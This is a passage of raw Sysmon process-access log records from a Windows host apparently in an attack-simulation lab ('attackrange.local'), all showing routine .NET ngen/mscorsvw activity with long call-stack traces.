NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.447{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.432{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.432{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.307{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.291{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.291{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:03.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.588{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.572{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.572{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
10341000x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.463{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.447{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.447{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.307{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.307{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:05.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.963{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.963{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84